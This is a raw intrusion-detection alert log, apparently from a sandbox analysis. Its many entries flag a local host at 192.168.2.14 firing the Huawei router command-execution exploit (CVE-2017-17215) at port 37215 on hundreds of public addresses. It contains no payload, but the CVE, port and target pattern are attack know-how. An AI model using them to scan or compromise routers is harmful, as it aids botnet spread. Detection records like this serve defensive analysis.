                                                        06/13/24-21:32:44.477125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4371237215192.168.2.14156.139.70.42
                                                        06/13/24-21:32:52.671582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001437215192.168.2.14197.129.242.100
                                                        06/13/24-21:32:09.440232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335437215192.168.2.14197.5.150.53
                                                        06/13/24-21:32:17.671295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421237215192.168.2.14156.74.40.140
                                                        06/13/24-21:33:07.040683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607837215192.168.2.1441.175.124.178
                                                        06/13/24-21:32:07.404513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3818037215192.168.2.1441.99.139.8
                                                        06/13/24-21:32:15.611273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4884037215192.168.2.14197.111.137.66
                                                        06/13/24-21:32:23.941698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820637215192.168.2.14197.14.95.116
                                                        06/13/24-21:31:59.199995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4466037215192.168.2.14156.234.131.16
                                                        06/13/24-21:32:21.800818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4795437215192.168.2.1441.133.189.173
                                                        06/13/24-21:32:23.831225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293837215192.168.2.1441.32.245.125
                                                        06/13/24-21:33:05.014635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395837215192.168.2.14197.37.56.222
                                                        06/13/24-21:32:44.450935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105237215192.168.2.14197.60.160.166
                                                        06/13/24-21:32:40.373524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3334237215192.168.2.1441.14.117.248
                                                        06/13/24-21:33:05.013604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6096837215192.168.2.14197.14.212.84
                                                        06/13/24-21:32:25.996197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891837215192.168.2.14156.98.162.187
                                                        06/13/24-21:32:15.611471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3696837215192.168.2.14156.25.76.98
                                                        06/13/24-21:32:36.265637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482037215192.168.2.1441.72.110.43
                                                        06/13/24-21:32:46.525694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3430637215192.168.2.14156.40.157.120
                                                        06/13/24-21:33:07.039034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3611237215192.168.2.14156.79.86.28
                                                        06/13/24-21:32:30.100614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913237215192.168.2.1441.166.140.52
                                                        06/13/24-21:32:36.245703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795237215192.168.2.14197.52.215.156
                                                        06/13/24-21:33:15.270612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5087437215192.168.2.14156.24.21.209
                                                        06/13/24-21:32:52.658787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993437215192.168.2.14197.219.251.1
                                                        06/13/24-21:33:00.870106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3288837215192.168.2.14197.255.74.208
                                                        06/13/24-21:32:15.610701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729637215192.168.2.14156.214.97.174
                                                        06/13/24-21:32:40.356406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940437215192.168.2.14156.6.168.207
                                                        06/13/24-21:32:01.237595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6074437215192.168.2.1441.112.83.38
                                                        06/13/24-21:32:19.730881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728237215192.168.2.1441.116.106.66
                                                        06/13/24-21:33:00.871428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456637215192.168.2.14197.39.170.77
                                                        06/13/24-21:32:44.475642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677837215192.168.2.1441.106.85.116
                                                        06/13/24-21:33:11.178149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083837215192.168.2.14197.12.42.188
                                                        06/13/24-21:32:56.754876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435237215192.168.2.1441.130.8.97
                                                        06/13/24-21:32:03.278095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432437215192.168.2.1441.177.114.51
                                                        06/13/24-21:32:23.835930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5600037215192.168.2.14156.66.157.49
                                                        06/13/24-21:32:28.048328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589037215192.168.2.14197.101.52.228
                                                        06/13/24-21:32:30.125732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4015237215192.168.2.14156.253.193.157
                                                        06/13/24-21:33:11.174493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137637215192.168.2.14197.196.157.20
                                                        06/13/24-21:32:05.346255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322637215192.168.2.14156.132.252.77
                                                        06/13/24-21:33:13.213075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244437215192.168.2.14197.201.231.153
                                                        06/13/24-21:32:28.025779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673437215192.168.2.14197.50.27.11
                                                        06/13/24-21:31:57.133945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434037215192.168.2.14156.255.56.160
                                                        06/13/24-21:33:11.157670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869637215192.168.2.14156.227.249.102
                                                        06/13/24-21:32:15.629981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3537637215192.168.2.1441.187.222.116
                                                        06/13/24-21:33:13.228273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414837215192.168.2.14197.191.26.16
                                                        06/13/24-21:32:11.485436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099037215192.168.2.14197.183.21.140
                                                        06/13/24-21:32:42.408478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363237215192.168.2.1441.21.128.111
                                                        06/13/24-21:33:07.038893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708637215192.168.2.14156.192.231.41
                                                        06/13/24-21:32:50.631663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684837215192.168.2.14156.157.232.197
                                                        06/13/24-21:32:30.100743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373037215192.168.2.14197.159.221.54
                                                        06/13/24-21:33:00.887731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379637215192.168.2.14156.212.187.207
                                                        06/13/24-21:32:44.475796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354437215192.168.2.14156.27.249.91
                                                        06/13/24-21:32:54.726034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3290437215192.168.2.14197.172.226.75
                                                        06/13/24-21:32:34.213313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731037215192.168.2.14156.202.140.123
                                                        06/13/24-21:32:40.372257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4429637215192.168.2.1441.70.231.237
                                                        06/13/24-21:33:13.212913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755037215192.168.2.14197.52.59.96
                                                        06/13/24-21:32:03.293769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684837215192.168.2.1441.116.81.92
                                                        06/13/24-21:33:15.272739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4436437215192.168.2.14197.237.138.174
                                                        06/13/24-21:32:30.075321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734837215192.168.2.14156.45.244.63
                                                        06/13/24-21:33:00.885878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909437215192.168.2.14197.165.172.165
                                                        06/13/24-21:32:46.504132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178437215192.168.2.14197.174.188.53
                                                        06/13/24-21:32:54.710796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110237215192.168.2.14197.52.158.2
                                                        06/13/24-21:33:15.253766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617637215192.168.2.1441.147.139.55
                                                        06/13/24-21:32:23.936560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957637215192.168.2.14156.134.153.220
                                                        06/13/24-21:32:30.097210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4418837215192.168.2.14156.128.228.247
                                                        06/13/24-21:31:59.199872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314237215192.168.2.14156.131.45.177
                                                        06/13/24-21:32:25.991172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510237215192.168.2.14197.207.111.255
                                                        06/13/24-21:32:48.573420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6047437215192.168.2.14197.163.107.104
                                                        06/13/24-21:33:07.041481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306037215192.168.2.14156.103.70.206
                                                        06/13/24-21:33:09.088141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336437215192.168.2.14156.72.6.186
                                                        06/13/24-21:33:11.154891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816837215192.168.2.14197.194.48.49
                                                        06/13/24-21:32:11.510064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3722037215192.168.2.14197.192.213.14
                                                        06/13/24-21:33:02.935522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631037215192.168.2.14197.107.159.50
                                                        06/13/24-21:32:46.503076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252837215192.168.2.14156.8.166.18
                                                        06/13/24-21:33:15.258098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306037215192.168.2.14197.242.15.221
                                                        06/13/24-21:32:38.316619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893037215192.168.2.1441.242.213.232
                                                        06/13/24-21:32:42.405100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385437215192.168.2.1441.239.102.161
                                                        06/13/24-21:32:01.241061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973437215192.168.2.14156.21.137.149
                                                        06/13/24-21:32:07.415835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933637215192.168.2.14197.177.228.222
                                                        06/13/24-21:32:30.100051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3365637215192.168.2.1441.154.119.50
                                                        06/13/24-21:32:28.044391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769237215192.168.2.1441.64.194.114
                                                        06/13/24-21:33:09.113706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985037215192.168.2.14156.99.248.46
                                                        06/13/24-21:32:15.603749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026037215192.168.2.14197.255.14.5
                                                        06/13/24-21:32:44.453069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3551637215192.168.2.14197.223.135.12
                                                        06/13/24-21:31:57.135784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407037215192.168.2.14197.187.123.53
                                                        06/13/24-21:32:32.166332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048637215192.168.2.14156.121.252.190
                                                        06/13/24-21:32:52.659821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483037215192.168.2.1441.210.97.99
                                                        06/13/24-21:32:52.656850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948237215192.168.2.1441.123.169.96
                                                        06/13/24-21:32:56.785264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5017637215192.168.2.14156.107.14.126
                                                        06/13/24-21:32:54.708852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705637215192.168.2.1441.62.145.187
                                                        06/13/24-21:32:23.832636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3602437215192.168.2.1441.212.48.170
                                                        06/13/24-21:33:15.256748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286837215192.168.2.1441.108.198.137
                                                        06/13/24-21:32:30.127497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468637215192.168.2.14156.58.64.228
                                                        06/13/24-21:32:23.833798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612237215192.168.2.1441.82.167.68
                                                        06/13/24-21:32:09.460156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5429637215192.168.2.1441.49.103.121
                                                        06/13/24-21:32:52.655156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739637215192.168.2.14197.250.137.223
                                                        06/13/24-21:33:07.042832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542637215192.168.2.1441.113.100.138
                                                        06/13/24-21:33:17.309889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238037215192.168.2.14197.118.225.57
                                                        06/13/24-21:33:13.231022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617037215192.168.2.14197.245.28.119
                                                        06/13/24-21:32:38.300398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365437215192.168.2.14156.243.144.159
                                                        06/13/24-21:32:32.171418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3743037215192.168.2.1441.242.174.16
                                                        06/13/24-21:33:09.108457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499437215192.168.2.14197.27.125.148
                                                        06/13/24-21:33:17.306996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5779437215192.168.2.1441.235.201.162
                                                        06/13/24-21:32:40.357927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5163237215192.168.2.14197.11.62.154
                                                        06/13/24-21:32:15.607833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5264637215192.168.2.14156.182.14.45
                                                        06/13/24-21:32:30.096856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089637215192.168.2.14197.19.239.32
                                                        06/13/24-21:32:38.317842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4307037215192.168.2.14197.121.9.48
                                                        06/13/24-21:33:05.011790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409237215192.168.2.14197.30.22.205
                                                        06/13/24-21:33:05.016252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4300437215192.168.2.1441.170.220.176
                                                        06/13/24-21:32:48.571798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665637215192.168.2.14197.181.232.10
                                                        06/13/24-21:32:54.711380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999437215192.168.2.14197.218.98.5
                                                        06/13/24-21:32:38.301397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4762837215192.168.2.14197.10.176.62
                                                        06/13/24-21:33:09.109657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5572837215192.168.2.14156.84.255.174
                                                        06/13/24-21:32:15.610742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660237215192.168.2.14197.216.178.28
                                                        06/13/24-21:32:28.028219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562437215192.168.2.14197.115.227.166
                                                        06/13/24-21:32:23.942438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3830237215192.168.2.14197.10.123.157
                                                        06/13/24-21:32:17.677821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573837215192.168.2.14156.144.63.149
                                                        06/13/24-21:32:30.100958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457037215192.168.2.14156.88.156.77
                                                        06/13/24-21:33:15.274810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433437215192.168.2.14156.85.168.96
                                                        06/13/24-21:33:05.011059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134037215192.168.2.14197.231.57.18
                                                        06/13/24-21:32:17.671665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3299637215192.168.2.1441.187.196.192
                                                        06/13/24-21:32:56.785764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975037215192.168.2.14156.159.108.105
                                                        06/13/24-21:32:46.509629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719037215192.168.2.14197.21.6.104
                                                        06/13/24-21:33:13.213653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870637215192.168.2.1441.233.61.156
                                                        06/13/24-21:32:21.785105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925637215192.168.2.1441.63.201.164
                                                        06/13/24-21:32:15.638708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566237215192.168.2.14156.219.118.25
                                                        06/13/24-21:32:48.554537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4720837215192.168.2.14156.70.203.249
                                                        06/13/24-21:32:15.633827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3834437215192.168.2.14197.125.191.143
                                                        06/13/24-21:32:13.570290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3915037215192.168.2.1441.3.180.129
                                                        06/13/24-21:32:56.783515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065437215192.168.2.14197.38.195.69
                                                        06/13/24-21:31:59.174873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702437215192.168.2.14197.127.43.8
                                                        06/13/24-21:32:44.475837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819237215192.168.2.14197.140.241.105
                                                        06/13/24-21:32:48.551143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591037215192.168.2.1441.62.30.72
                                                        06/13/24-21:32:13.546147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416837215192.168.2.14197.95.210.112
                                                        06/13/24-21:32:36.262980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526037215192.168.2.1441.205.166.198
                                                        06/13/24-21:32:15.605818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877437215192.168.2.1441.178.130.242
                                                        06/13/24-21:32:32.153420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687037215192.168.2.14156.60.204.83
                                                        06/13/24-21:32:17.693995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411637215192.168.2.14156.74.1.31
                                                        06/13/24-21:32:03.307125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839437215192.168.2.14197.224.26.33
                                                        06/13/24-21:32:09.437684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5692237215192.168.2.14197.106.166.63
                                                        06/13/24-21:32:48.573280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596237215192.168.2.1441.235.27.112
                                                        06/13/24-21:32:17.671041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289037215192.168.2.14156.155.46.16
                                                        06/13/24-21:33:05.012300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995637215192.168.2.14156.253.249.157
                                                        06/13/24-21:33:07.056864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3579637215192.168.2.14156.130.20.244
                                                        06/13/24-21:32:40.354515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4427637215192.168.2.1441.118.159.163
                                                        06/13/24-21:32:48.555104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977237215192.168.2.1441.167.90.118
                                                        06/13/24-21:31:57.091284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405837215192.168.2.14156.112.241.178
                                                        06/13/24-21:32:56.754122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147037215192.168.2.1441.223.91.15
                                                        06/13/24-21:32:36.242228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4058637215192.168.2.14197.162.147.25
                                                        06/13/24-21:32:56.754794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135637215192.168.2.1441.151.102.120
                                                        06/13/24-21:32:58.840020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554037215192.168.2.14197.4.1.203
                                                        06/13/24-21:32:07.404145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260037215192.168.2.14197.9.17.137
                                                        06/13/24-21:32:36.247016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005037215192.168.2.14156.208.54.66
                                                        06/13/24-21:32:30.097964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3334437215192.168.2.14197.248.4.121
                                                        06/13/24-21:32:13.566878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532037215192.168.2.14197.12.161.14
                                                        06/13/24-21:33:00.888555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334637215192.168.2.14156.233.109.119
                                                        06/13/24-21:32:25.994703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275037215192.168.2.14197.136.48.150
                                                        06/13/24-21:33:00.886500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261837215192.168.2.14197.169.194.72
                                                        06/13/24-21:32:32.151927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827837215192.168.2.14197.26.26.21
                                                        06/13/24-21:32:34.193036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331637215192.168.2.14156.237.91.173
                                                        06/13/24-21:33:09.102257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3423837215192.168.2.1441.232.14.166
                                                        06/13/24-21:32:03.275677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787437215192.168.2.14197.41.203.209
                                                        06/13/24-21:32:19.751255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3684437215192.168.2.1441.225.211.90
                                                        06/13/24-21:32:40.373649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359037215192.168.2.1441.84.41.79
                                                        06/13/24-21:32:46.526652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002037215192.168.2.14197.151.33.203
                                                        06/13/24-21:33:15.273102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5264037215192.168.2.14197.23.84.100
                                                        06/13/24-21:33:02.910104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465637215192.168.2.14197.117.182.103
                                                        06/13/24-21:32:40.355050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097037215192.168.2.14197.51.98.253
                                                        06/13/24-21:32:03.275822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872237215192.168.2.14197.138.1.242
                                                        06/13/24-21:32:38.298132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3927037215192.168.2.1441.140.146.252
                                                        06/13/24-21:32:52.658603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997037215192.168.2.14156.85.172.44
                                                        06/13/24-21:33:15.254377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298437215192.168.2.14156.57.216.252
                                                        06/13/24-21:32:07.416071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4412837215192.168.2.1441.27.36.92
                                                        06/13/24-21:33:00.871739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314237215192.168.2.14197.198.49.87
                                                        06/13/24-21:33:15.276526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948237215192.168.2.1441.154.69.68
                                                        06/13/24-21:32:07.416901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852237215192.168.2.14197.216.178.229
                                                        06/13/24-21:33:00.889154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046237215192.168.2.14197.114.110.11
                                                        06/13/24-21:31:57.153960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213637215192.168.2.14197.5.170.219
                                                        06/13/24-21:32:03.301119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901437215192.168.2.14197.229.252.255
                                                        06/13/24-21:32:07.420215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469037215192.168.2.14156.181.84.179
                                                        06/13/24-21:32:34.214445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777437215192.168.2.1441.103.11.208
                                                        06/13/24-21:33:15.272691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4611037215192.168.2.14197.240.171.117
                                                        06/13/24-21:32:38.298853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083237215192.168.2.1441.175.180.148
                                                        06/13/24-21:32:09.438139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4667837215192.168.2.14156.209.116.137
                                                        06/13/24-21:33:02.954813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058637215192.168.2.14156.225.89.225
                                                        06/13/24-21:32:46.528395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541837215192.168.2.1441.110.74.96
